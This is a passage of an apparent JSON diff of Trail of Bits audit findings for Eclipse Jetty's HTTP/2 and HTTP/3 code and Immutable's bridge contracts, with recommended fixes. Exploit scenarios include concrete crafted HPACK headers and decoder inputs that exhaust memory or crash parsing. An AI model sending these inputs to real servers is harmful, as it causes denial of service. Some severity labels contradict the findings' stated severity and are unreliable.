Severity: Medium Diculty: Low Type: Denial of Service Finding ID: TOB-JETTY-8 Target: org.eclipse.jetty.websocket.core.internal.Parser", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "9. Risk of integer overow in HPACK's NBitInteger.decode ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The static function NBitInteger.decode is used to decode bytestrings in HPACK's integer format. It should return only positive integers since HPACKs integer format is not intended to support negative numbers. However, the following loop in NBitInteger.decode is susceptible to integer overows in its multiplication and addition operations: public static int decode (ByteBuffer buffer, int n) { if (n == 8 ) { // ... } int nbits = 0xFF >>> ( 8 - n); int i = buffer.get(buffer.position() - 1 ) & nbits; if (i == nbits) { int m = 1 ; int b; do { b = 0xff & buffer.get(); i = i + (b & 127 ) * m; m = m * 128 ; } while ((b & 128 ) == 128 ); } return i; } Figure 9.1: NBitInteger.java , lines 105145 For example, NBitInteger.decode(0xFF8080FFFF0F, 7) returns -16257 . Any overow that occurs in the function would not be a problem on its own since, in general, the output of this function ought to be validated before it is used; however, when coupled with other issues (refer to TOB-JETTY-10 ), an overow can cause vulnerabilities. 49 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, modify NBitInteger.decode to check that its result is nonnegative before returning it. Long term, consider merging the QPACK and HPACK implementations for NBitInteger , since they perform the same functionality; the QPACK implementation of NBitInteger checks for overows. 50 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "10. MetaDataBuilder.checkSize accepts headers of negative lengths ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The MetaDataBuilder.checkSize function accepts user-entered HPACK header values of negative sizes, which could cause a very large buer to be allocated later when the user-entered size is multiplied by 2. MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded: public void checkSize ( int length, boolean huffman) throws SessionException { // Apply a huffman fudge factor if (huffman) length = (length * 4 ) / 3 ; if ((_size + length) > _maxSize) throw new HpackException.SessionException( \"Header too large %d > %d\" , _size + length, _maxSize); } Figure 10.1: MetaDataBuilder.java , lines 291298 However, it does not throw an exception if the size is negative. Later, the Huffman.decode function multiplies the user-entered length by 2 before allocating a buer: public static String decode (ByteBuffer buffer, int length) throws HpackException.CompressionException { Utf8StringBuilder utf8 = new Utf8StringBuilder(length * 2 ); // ... Figure 10.2: Huffman.java , lines 357359 This means that if a user provides a negative length value (or, more precisely, a length value that becomes negative when multiplied by the 4/3 fudge factor), and this length value becomes a very large positive number when multiplied by 2, then the user can cause a very large buer to be allocated on the server. 51 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker repeatedly sends HTTP messages with the HPACK header 0x00ff8080ffff0b . Each time this header is decoded, the following occurs: HpackDecode.decode determines that a Human-coded value of length -1073758081 needs to be decoded. MetaDataBuilder.checkSize approves this length. The number is multiplied by 2, resulting in 2147451134 , and Huffman.decode allocates a 2.1 GB string array. Huffman.decode experiences a buer overow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by adding valid Human-coded characters to the end of the header.) Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory. Recommendations Short term, have MetaDataBuilder.checkSize check that the given length is positive directly before adding it to _size and comparing it with _maxSize . Long term, add checks for integer overows in Huffman.decode and in NBitInteger.decode (refer to TOB-JETTY-9 ) for added redundancy. 52 OSTIF Eclipse: Jetty Security Assessment 11. Insu\u0000cient space allocated when encoding QPACK instructions and entries Severity: Low Diculty: High Type: Denial of Service Finding ID: TOB-JETTY-11 Target: org.eclipse.jetty.http3.qpack.internal.instruction.IndexedName EntryInstruction org.eclipse.jetty.http3.qpack.internal.instruction.LiteralName EntryInstruction org.eclipse.jetty.http3.qpack.internal.instruction.EncodableEn try", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "12. LiteralNameEntryInstruction incorrectly encodes value length ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "QPACK instructions for inserting entries with literal names and non-Human-coded values will be encoded incorrectly when the values length is over 30, which could cause values to be sent incorrectly or errors to occur during decoding. The following snippet of the LiteralNameEntryInstruction.encode function is responsible for encoding the header value: if (_huffmanValue) byteBuffer.put(( byte )( 0x80 )); NBitIntegerEncoder.encode(byteBuffer, 7 , HuffmanEncoder.octetsNeeded(_value)); HuffmanEncoder.encode(byteBuffer, _value); 78 79 { 80 81 82 83 } 84 85 { 86 87 88 89 } else byteBuffer.put(( byte )( 0x00 )); NBitIntegerEncoder.encode(byteBuffer, 5 , _value.length()); byteBuffer.put(_value.getBytes()); Figure 12.1: LiteralNameEntryInstruction.java , lines 7889 On line 87, 5 is the second parameter to NBitIntegerEncoder.encode , indicating that the number will take up 5 bits in the rst encoded byte; however, the second parameter should be 7 instead. This means that when _value.length() is over 30, it will be incorrectly encoded. Jettys HTTP/3 code is still considered experimental, so this issue should not aect production code, but it should be xed before announcing HTTP/3 support to be production-ready. 56 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, change the second parameter of the NBitIntegerEncoder.encode function from 5 to 7 in order to reect that the number will take up 7 bits. Long term, write more tests to catch similar encoding/decoding problems. 57 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "13. FileInitializer does not check for symlinks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Module conguration les can direct Jetty to download a remote le and save it in the local lesystem while initializing the module. During this process, the FileInitializer class validates the destination path and throws an IOException exception if the destination is outside the ${jetty.base} directory. However, this validation routine does not check for symlinks: // now on copy/download paths (be safe above all else) if (destination != null && !destination.startsWith(_basehome.getBasePath())) throw new IOException( \"For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - \" + location); Figure 13.1: FileInitializer.java , lines 112114 None of the subclasses of FileInitializer check for symlinks either. Thus, if the ${jetty.base} directory contains a symlink, a le path in a modules .ini le beginning with the symlink name will pass the validation check, and the le will be written to a subdirectory of the symlinks destination. Exploit Scenario A systems ${jetty.base} directory contains a symlink called dir , which points to /etc . The system administrator enables a Jetty module whose .ini le contains a [files] entry that downloads a remote le and writes it to the relative path dir/config.conf . The lesystem follows the symlink and writes a new conguration le to /etc/config.conf , which impacts the servers system conguration. Additionally, since the FileInitializer class uses the REPLACE_EXISTING ag, this behavior overwrites an existing system conguration le. Recommendations Short term, rewrite all path checks in FileInitializer and its subclasses to include a call to the Path.toRealPath function, which, by default, will resolve symlinks and produce the real lesystem path pointed to by the Path object. If this real path is outside ${jetty.base} , the le write operation should fail. 58 OSTIF Eclipse: Jetty Security Assessment Long term, consolidate all lesystem operations involving the ${jetty.base} or ${jetty.home} directories into a single centralized class that automatically performs symlink resolution and rejects operations that attempt to read from or write to an unauthorized directory. This class should catch and handle the IOException exception that is thrown in the event of a link loop or a large number of nested symlinks. 59 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "14. FileInitializer permits downloading les via plaintext HTTP ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Module conguration les can direct Jetty to download a remote le and save it in the local lesystem while initializing the module. If the specied URL is a plaintext HTTP URL, Jetty does not raise an error or warn the user. Transmitting les over plaintext HTTP is intrinsically unsecure and exposes sensitive data to tampering and eavesdropping in transit. Exploit Scenario A system administrator enables a Jetty module that downloads a remote le over plaintext HTTP during initialization. An attacker with a network intermediary position snis the trac and infers sensitive information about the design and conguration of the Jetty system under conguration. Alternatively, the attacker actively tampers with the le during transmission from the remote server to the Jetty installation, which enables the attacker to alter the modules behavior and launch other attacks against the targeted system. Recommendations Short term, add a check to the FileInitializer class and its subclasses to prohibit downloads over plaintext HTTP. Additionally, add a validation check to the module .ini le parser to reject any conguration that includes a plaintext HTTP URL in the [files] section. Long term, consolidate all remote le downloads conducted during module conguration operations into a single centralized class that automatically rejects plaintext HTTP URLs. If current use cases require support of plaintext HTTP URLs, then at a minimum, have Jetty display a prominent warning message and prompt the user for manual conrmation before performing the unencrypted download. 60 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "15. NullPointerException thrown by FastCGI parser on invalid frame type ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Because of a missing null check, the Jetty FastCGI clients Parser class throws a NullPointerException exception when parsing a frame with an invalid frame type eld. This exception occurs because the findContentParser function returns null when it does not have a ContentParser object matching the specied frame type, and the caller never checks the findContentParser return value for null before dereferencing it. case CONTENT: { ContentParser contentParser = findContentParser(headerParser.getFrameType()); if (headerParser.getContentLength() == 0 ) { padding = headerParser.getPaddingLength(); state = State.PADDING; if (contentParser.noContent()) return true ; } else { ContentParser.Result result = contentParser.parse(buffer); // ...[snip]... } break ; } Figure 15.1: Parser.java , lines 82114 Exploit Scenario An attacker operates a malicious web server that supports FastCGI. A Jetty application communicates with this server by using Jettys built-in FastCGI client. The remote server transmits a frame with an invalid frame type, causing a NullPointerException exception and a crash in the Jetty application. Recommendations Short term, add a null check to the parse function to abort the parsing process before dereferencing a null return value from findContentParser . If a null value is detected, 61 OSTIF Eclipse: Jetty Security Assessment parse should throw an appropriate exception, such as IllegalStateException , that Jetty can catch and handle safely. Long term, build out a larger suite of test cases that ensures graceful handling of malformed trac and data. 62 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "16. Documentation does not specify that request contents and other user data can be exposed in debug logs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Over 100 times, the system calls LOG.debug with a parameter of the format BufferUtil.toDetailString(buffer) , which outputs up to 56 bytes of the buer into the log le. Jettys implementations of various protocols and encodings, including GZIP, WebSocket, multipart encoding, and HTTP/2, output user data received over the network to the debug log using this type of call. An example instance from Jettys WebSocket implementation appears in gure 16.1. public Frame.Parsed parse (ByteBuffer buffer) throws WebSocketException { try { // parse through while (buffer.hasRemaining()) { if (LOG.isDebugEnabled()) LOG.debug( \"{} Parsing {}\" , this , BufferUtil.toDetailString(buffer)); // ...[snip]... } // ...[snip]... } // ...[snip]... } Figure 16.1: Parser.java , lines 8896 Although the Jetty 12 Operations Guide does state that Jetty debugging logs can quickly consume massive amounts of disk space, it does not advise system administrators that the logs can contain sensitive user data, such as personally identiable information. Thus, the possibility of raw trac being captured from debug logs is undocumented. Exploit Scenario A Jetty system administrator turns on debug logging in a production environment. During the normal course of operation, a user sends trac containing sensitive information, such as personally identiable information or nancial data, and this data is recorded to the 63 OSTIF Eclipse: Jetty Security Assessment debug log. An attacker who gains access to this log can then read the user data, compromising data condentiality and the users privacy rights. Recommendations Short term, update the Jetty Operations Guide to state that in addition to being extremely large, debug logs can contain sensitive user data and should be treated as sensitive. Long term, consider moving all debugging messages that contain buer excerpts into a high-detail debug log that is enabled only for debug builds of the application. 64 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "17. HttpStreamOverFCGI internally marks all requests as plaintext HTTP ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The HttpStreamOverFCGI class processes FastCGI messages in a format that can be processed by other system components that use the HttpStream interface. This classs onHeaders callback mistakenly marks each MetaData.Request object as a plaintext HTTP request, as the TODO comment shown in gure 17.1 indicates: public void onHeaders () { String pathQuery = URIUtil.addPathQuery(_path, _query); // TODO https? MetaData.Request request = new MetaData.Request(_method, HttpScheme.HTTP.asString(), hostPort, pathQuery, HttpVersion.fromString(_version), _headers, Long.MIN_VALUE); // ...[snip]... } Figure 17.1: HttpStreamOverFCGI.java , lines 108119 In some congurations, other Jetty components could misinterpret a message received over FCGI as a plaintext HTTP message, which could cause a request to be incorrectly rejected, redirected in an innite loop, or forwarded to another system over a plaintext HTTP channel instead of HTTPS. Exploit Scenario A Jetty instance runs an FCGI server and uses the HttpStream interface to process messages. The MetaData.Request classs getURI method is used to check the incoming requests URI. This method mistakenly returns a plaintext HTTP URL due to the bug in HttpStreamOverFCGI.java . One of the following takes place during the processing of this request: An application-level security control checks the incoming requests URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application rejects the request and refuses to process it, causing a denial of service. An application-level security control checks the incoming requests URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application 65 OSTIF Eclipse: Jetty Security Assessment attempts to redirect the user to a suitable HTTPS URL. The check fails on this redirected request as well, causing an innite redirect loop and a denial of service. An application processing FCGI messages acts as a proxy, forwarding certain requests to a third HTTP server. It uses MetaData.Request.getURI to check the requests original URI and mistakenly sends a request over plaintext HTTP. Recommendations Short term, correct the bug in HttpStreamOverFCGI.java to generate the correct URI for the incoming request. Long term, consider streamlining the HTTP implementation to minimize the need for dierent classes to generate URIs from request data. 66 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "18. Excessively permissive and non-standards-compliant error handling in HTTP/2 implementation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Jettys HTTP/2 implementation violates RFC 9113 in that it fails to terminate a connection with an appropriate error code when the remote peer sends a frame with one of the following protocol violations: A SETTINGS frame with the ACK ag set and a nonzero payload length A PUSH_PROMISE frame in a stream with push disabled A GOAWAY frame with its stream ID not set to zero None of these situations creates an exploitable vulnerability. However, noncompliant protocol implementations can create compatibility problems and could cause vulnerabilities when deployed in combination with other miscongured systems. Exploit Scenario A Jetty instance connects to an HTTP/2 server, or serves a connection from an HTTP/2 client, and the remote peer sends trac that should cause Jetty to terminate the connection. Instead, Jetty keeps the connection alive, in violation of RFC 9113. If the remote peer is programmed to handle the noncompliant trac dierently than Jetty, further problems could result, as the two implementations interpret protocol messages dierently. Recommendations Short term, update the HTTP/2 implementation to check for the following error conditions and terminate the connection with an error code that complies with RFC 9113: A peer receives a SETTINGS frame with the ACK ag set and a payload length greater than zero. A client receives a PUSH_PROMISE frame after having sent, and received an acknowledgement for, a SETTINGS frame with SETTINGS_ENABLE_PUSH equal to zero. 67 OSTIF Eclipse: Jetty Security Assessment A peer receives a GOAWAY frame with the stream identier eld not set to zero. Long term, audit Jettys implementation of HTTP/2 and other protocols to ensure that Jetty handles errors in a standards-compliant manner and terminates connections as required by the applicable specications. 68 OSTIF Eclipse: Jetty Security Assessment 19. XML external entities and entity expansion in Maven package metadata parser Severity: High Diculty: High Type: Data Validation Finding ID: TOB-JETTY-19 Target: org.eclipse.jetty.start.fileinits.MavenMetadata", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "20. Use of deprecated AccessController class ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The classes listed in the Target cell above use the java.security.AccessController class, which is a deprecated class slated to be removed in a future Java release. The java.security library documentation states that the AccessController class is only useful in conjunction with the Security Manager, which is also deprecated. Thus, the use of AccessController no longer serves any benecial purpose. The use of this deprecated class could impact Jettys compatibility with future releases of the Java SDK. Recommendations Short term, remove all uses of the AccessController class. Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes. 70 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "21. QUIC server writes SSL private key to temporary plaintext le ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Jettys QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudare. When the servers SSL certicate is handed o to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM le: protected void doStart () throws Exception { // ...[snip]... char [] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray(); String keyManagerPassword = sslContextFactory.getKeyManagerPassword(); SSLKeyPair keyPair = new SSLKeyPair( sslContextFactory.getKeyStoreResource().getPath(), sslContextFactory.getKeyStoreType(), keyStorePassword, alias, keyManagerPassword == null ? keyStorePassword : keyManagerPassword.toCharArray() ); File[] pemFiles = keyPair.export( new File(System.getProperty( \"java.io.tmpdir\" ))); privateKeyFile = pemFiles[ 0 ]; certificateChainFile = pemFiles[ 1 ]; } Figure 21.1: QuicServerConnector.java , lines 154179 Storing the private key in this manner exposes it to increased risk of theft. Although the QuicServerConnector class deletes the private key le upon stopping the server, this deleted le may not be immediately removed from the physical storage medium, exposing the le to potential theft by attackers who can access the raw bytes on the disk. A review of quiche suggests that the librarys API may not support reading a DES-encrypted keyle. If that is true, then remediating this issue would require updates to the underlying quiche library. 71 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker gains read access to a Jetty HTTP/3 servers temporary directory while the server is running. The attacker can retrieve the temporary keyle and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certicate. Recommendations Short term, investigate the quiche librarys API to determine whether it can readily support password-encrypted private keyles. If so, update Jetty to save the private key in a temporary password-protected le and to forward that password to quiche. Alternatively, if password-encrypted private keyles can be supported, have Jetty pass the unencrypted private key directly to quiche as a function argument. Either option would obviate the need to store the key in a plaintext le on the servers lesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a x for this issue. 72 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "22. Repeated code between HPACK and QPACK ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Classes for dealing with n-bit integers and Human coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two dierent places, sometimes with identical code and other times with dierent implementations. In some cases ( TOB-JETTY-9 ), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged. Exploit Scenario A vulnerability is found in the Human encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is xed in one implementation but not the other, leaving one of the implementations vulnerable. Recommendations Short term, merge the two implementations of n-bit integers and Human coding classes. Long term, audit the Jetty codebase for other classes with very similar functionality. 73 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions: HpackDecoder.decode(0x03) throws BufferUnderflowException . HpackDecoder.decode(0x4800) throws NumberFormatException . HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException . HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException . HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException . QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException . QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException . For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception within the catch statement would result in cleaner, more robust code. Exploit Scenario Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability. Recommendations Short term, document in the code that Java-level exceptions can be thrown. Long term, modify the decode functions so that they throw only Jetty-level exceptions. 74 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: N/A" + ] + }, + { + "title": "24. Incorrect QPACK encoding when multi-byte characters are used ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "Javas string.length() function returns the number of characters in a string, which can be dierent from the number of bytes returned by the string.getBytes() function. However, QPACK encoding methods assume that they return the same number, which could cause incorrect encodings. In EncodableEntry.LiteralEntry , which is used to encode HTTP/3 header elds, the following method is used for encoding: public void encode (ByteBuffer buffer, int base) 214 215 { 216 byte allowIntermediary = 0x00 ; // TODO: this is 0x10 bit, when should this be set? 217 218 219 220 221 222 223 224 String name = getName(); String value = getValue(); // Encode the prefix code and the name. if (_huffman) { buffer.put(( byte )( 0x28 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , HuffmanEncoder.octetsNeeded(name)); 225 226 227 HuffmanEncoder.encode(buffer, name); buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); 228 229 230 231 232 HuffmanEncoder.encode(buffer, value); } else { // TODO: What charset should we be using? (this applies to the instruction generators as well). 233 234 235 236 237 238 buffer.put(( byte )( 0x20 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , name.length()); buffer.put(name.getBytes()); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); 75 OSTIF Eclipse: Jetty Security Assessment 239 240 } } Figure 24.1: EncodableEntry.java , lines 214240 Note in particular lines 232238, which are used to encode literal (non-Human-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes() . Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes() . When this bytestring is decoded, the decoder will read the name length eld and then read that many bytes as the name. If multibyte characters were used in the name eld, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value eld. The same issue appears in EncodableEntry.ReferencedNameEntry.encode : if (_huffman) 164 // Encode the value. 165 String value = getValue(); 166 167 { 168 169 170 171 } 172 173 { 174 175 176 177 } else buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); HuffmanEncoder.encode(buffer, value); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); Figure 24.2: EncodableEntry.java , lines 164177 If value has multibyte characters, it will be incorrectly encoded in lines 174176. Jettys HTTP/3 code is still considered experimental, so this issue should not aect production code, but it should be xed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly. 76 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using string.getBytes() rather than string.length() . 77 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "25. No limits on maximum capacity in QPACK decoder ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-eclipse-jetty-securityreview.pdf", + "body": "In QPACK, an encoder can set the dynamic table capacity of the decoder using a Set Dynamic Table Capacity instruction. The HTTP/3 specication requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. However, nowhere in the QPACK code is this limit checked for. This means that the encoder can choose whatever capacity it wants (up to Javas maximum integer value), allowing it to take up large amounts of space on the decoders memory. Jettys HTTP/3 code is still considered experimental, so this issue should not aect production code, but it should be xed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a Set Dynamic Table Capacity instruction, setting the dynamic table capacity to Javas maximum integer value, 2 31-1 (2.1 GB). He then repeatedly enters very large values into the servers dynamic table using an Insert with Literal Name instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes. Recommendations Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity. Long term, audit Jettys implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards. 78 OSTIF Eclipse: Jetty Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "1. Initialization functions vulnerable to front-running ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "Several implementation contracts have initialization functions that can be front-run, which would allow an attacker to incorrectly initialize the contracts. Due to the use of the delegatecall proxy pattern, the RootERC20Predicate and RootERC20PredicateFlowRate contracts (as well as other upgradeable contracts that are not in scope) cannot be initialized with a constructor, so they have initialize functions: function initialize ( address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external virtual initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); } Figure 1.1: Front-runnable initialize function ( RootERC20Predicate.sol ) function initialize ( address superAdmin , address pauseAdmin , address unpauseAdmin , address rateAdmin , address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); __Pausable_init(); __FlowRateWithdrawalQueue_init(); _setupRole(DEFAULT_ADMIN_ROLE, superAdmin); _setupRole(PAUSER_ADMIN_ROLE, pauseAdmin); _setupRole(UNPAUSER_ADMIN_ROLE, unpauseAdmin); _setupRole(RATE_CONTROL_ROLE, rateAdmin); } Figure 1.2: Front-runnable initialize function ( RootERC20PredicateFlowRate.sol ) An attacker could front-run these functions and initialize the contracts with malicious values. The documentation provided by the Immutable team indicates that they are aware of this issue and how to mitigate it upon deployment of the proxy or when upgrading the implementation. However, there do not appear to be any deployment scripts to demonstrate that this will be correctly done in practice, and the codebases tests do not cover upgradeability. Exploit Scenario Bob deploys the RootERC20Predicate contract. Eve deploys an upgradeable version of the ExitHelper contract and front-runs the RootERC20Predicate initialization, passing her contracts address as the exitHelper argument. Due to a lack of post-deployment checks, this issue goes unnoticed and the protocol functions as intended for some time, drawing in a large amount of deposits. Eve then upgrades the ExitHelper contract to allow her to arbitrarily call the onL2StateReceive function of the RootERC20Predicate contract, draining all assets from the bridge. Recommendations Short term, either use a factory pattern that will prevent front-running the initialization, or ensure that the deployment scripts have robust protections against front-running attacks. Long term, carefully review the Solidity documentation , especially the Warnings section, and the pitfalls of using the delegatecall proxy pattern.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "2. Lack of lower and upper bounds for system parameters ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "The lack of lower and upper bound checks when setting important system parameters could lead to a temporary denial of service, allow users to complete their withdrawals prematurely, or otherwise hinder the expected performance of the system. The setWithdrawalDelay function of the RootERC20PredicateFlowRate contract can be used by the rate control role to set the amount of time that a user needs to wait before they can withdraw their assets from the root chain of the bridge. // RootERC20PredicateFlowRate.sol function setWithdrawalDelay ( uint256 delay ) external onlyRole(RATE_CONTROL_ROLE) { _setWithdrawalDelay(delay); } // FlowRateWithdrawalQueue.sol function _setWithdrawalDelay ( uint256 delay ) internal { withdrawalDelay = delay; emit WithdrawalDelayUpdated(delay); } Figure 2.1: The setter functions for the withdrawalDelay state variable ( RootERC20PredicateFlowRate.sol and FlowRateWithdrawalQueue.sol ) The withdrawalDelay variable value is applied to all currently pending withdrawals in the system, as shown in the highlighted lines of gure 2.2. function _processWithdrawal ( address receiver , uint256 index ) internal returns ( address withdrawer , address token , uint256 amount ) { // ... // Note: Add the withdrawal delay here, and not when enqueuing to allow changes // to withdrawal delay to have effect on in progress withdrawals. uint256 withdrawalTime = withdrawal.timestamp + withdrawalDelay; // slither-disable-next-line timestamp if ( block.timestamp < withdrawalTime) { // solhint-disable-next-line not-rely-on-time revert WithdrawalRequestTooEarly( block.timestamp , withdrawalTime); } // ... } Figure 2.2: The function completes a withdrawal from the withdrawal queue if the withdrawalTime has passed. ( FlowRateWithdrawalQueue.sol ) However, the setWithdrawalDelay function does not contain any validation on the delay input parameter. If the input parameter is set to zero, users can skip the withdrawal queue and immediately withdraw their assets. Conversely, if this variable is set to a very high value, it could prevent users from withdrawing their assets for as long as this variable is not updated. The setRateControlThreshold allows the rate control role to set important token parameters that are used to limit the amount of tokens that can be withdrawn at once, or in a certain time period, in order to mitigate the risk of a large amount of tokens being bridged after an exploit. // RootERC20PredicateFlowRate.sol function setRateControlThreshold ( address token , uint256 capacity , uint256 refillRate , uint256 largeTransferThreshold ) external onlyRole(RATE_CONTROL_ROLE) { _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; } // FlowRateDetection.sol function _setFlowRateThreshold ( address token , uint256 capacity , uint256 refillRate ) internal { if (token == address ( 0 )) { revert InvalidToken(); } if (capacity == 0 ) { revert InvalidCapacity(); } if (refillRate == 0 ) { revert InvalidRefillRate(); } Bucket storage bucket = flowRateBuckets[token]; if (bucket.capacity == 0 ) { bucket.depth = capacity; } bucket.capacity = capacity; 